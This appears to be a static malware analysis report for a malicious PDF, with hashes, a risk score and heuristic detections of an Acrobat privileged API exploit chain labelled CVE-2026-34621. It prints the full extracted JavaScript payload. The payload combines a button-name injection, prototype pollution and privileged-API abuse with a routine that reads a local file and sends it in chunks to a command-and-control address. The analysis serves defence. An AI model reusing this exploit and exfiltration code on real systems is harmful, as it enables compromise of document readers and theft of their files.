Malicious PDF — malware analysis report

Static analysis result for SHA-256 e6039f6e0005cdc4…

MALICIOUS

PDF

3.5 KB First seen: 2026-06-25
MD5: 97d52c756a6ccc882cbb0fe1662bcce8 SHA-1: 3191239cdd31e8d1d5dcceae9c4aec9ce451d756 SHA-256: e6039f6e0005cdc4a1fbf41866628b5b74f410b5b16abc5e28bc92e598e238f2
258 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 6

  • Adobe Acrobat/Reader privileged API chain — CVE-2026-34621 critical CVE exact CVE_2026_34621
    PDF JavaScript matches the CVE-2026-34621 exploit chain: Acrobat internal UI/share APIs, swConn prototype/getter manipulation, and privileged RSS or file-read APIs used for staged command-and-control.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Prototype-pollution JavaScript pattern high CVE related PDF_JS_PROTOTYPE_POLLUTION
    PDF JavaScript mutates object prototypes while also referencing privileged or sensitive PDF APIs. This tracks a modern PDF exploit technique family without assigning an unverified CVE.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
                ANShareFile({ 'doc': eval('this') });
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0003_000.js pdf-javascript-stream PDF /JS object 3 at offset 0xA9 2811 bytes
SHA-256: 47d9c83d9a81921db21c6a6d084b1a10a230b203ab5ebc8abe1643d763d8993c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
global.stealfile = function readFileAndExfiltrate() {
    try {
        app.beginPriv();
        var stream = util.readFileIntoStream("/C/Windows/System32/drivers/etc/hosts", false);
        app.endPriv();

        if (!stream) {
//            app.alert("Stream is null");
            return false;
        }

        var hexData = stream.read(5242880); // This is ALREADY hex data!
        if (!hexData || hexData.length === 0) {
            app.alert("No data read");
            return false;
        }

    //    app.alert("Hex length: " + hexData.length);
      //  app.alert("First 50 chars: " + hexData.substring(0, 50));

        // SEND HEX DATA DIRECTLY - Split into chunks
        var C2_HOST = "192.168.56.1";
        var C2_PORT = "45191";
        var chunkSize = 1000;
        var totalChunks = Math.ceil(hexData.length / chunkSize);
        
  //      app.alert("Sending " + totalChunks + " chunks...");
        
        for (var i = 0; i < hexData.length; i += chunkSize) {
            var chunk = hexData.substring(i, i + chunkSize);
            var chunkNum = (i / chunkSize) + 1;
            
            var url = "http://" + C2_HOST + ":" + C2_PORT + "/exfil?file=file&size=" +
                      hexData.length + "&chunk=" + chunkNum + "&total=" + totalChunks +
                      "&data=" + encodeURIComponent(chunk);
            
            app.launchURL(url, false);
        }
        
        //app.alert("All " + totalChunks + " chunks sent to C2!");
        return true;

    } catch(e) {
        app.alert("Error: " + e);
        return false;
    }
};

global.A = () => {
   
    global.B = function(functionRef) {
        try {
           
            stream = {
                'read': app.trustedFunction.bind(app, functionRef)
            };

           
            ob = {
                'getFullName': SOAP.stringFromStream.bind(SOAP, stream)
            };

        
            Object.prototype.__defineGetter__('swConn', () => { return ob; });

           
            data = { 'WT': '' };
            this.dirty = false;

            
            fakeobj = {
                'lastIndexOf': SilentDocCenterLogin.bind(app, data, {}),
                'substring': () => { throw Error(''); }
            };

           
            this.__defineGetter__('path', () => { return fakeobj; });

            
            ANShareFile({ 'doc': eval('this') });

        } catch (e) {
        }
    };
};


buttons = {
    "a(a(a'); }); global.A(); throw Error('oops'); //": 0
};


try {
    ANFancyAlertImpl('', [], 0, buttons, 0, 0, 0, 0, 0);
} catch (e) {
    
}

delete Object.prototype.swConn;


global.B(global.stealfile);                   
global.stealfile();

Open this report in the interactive analyzer, or submit your own file for analysis.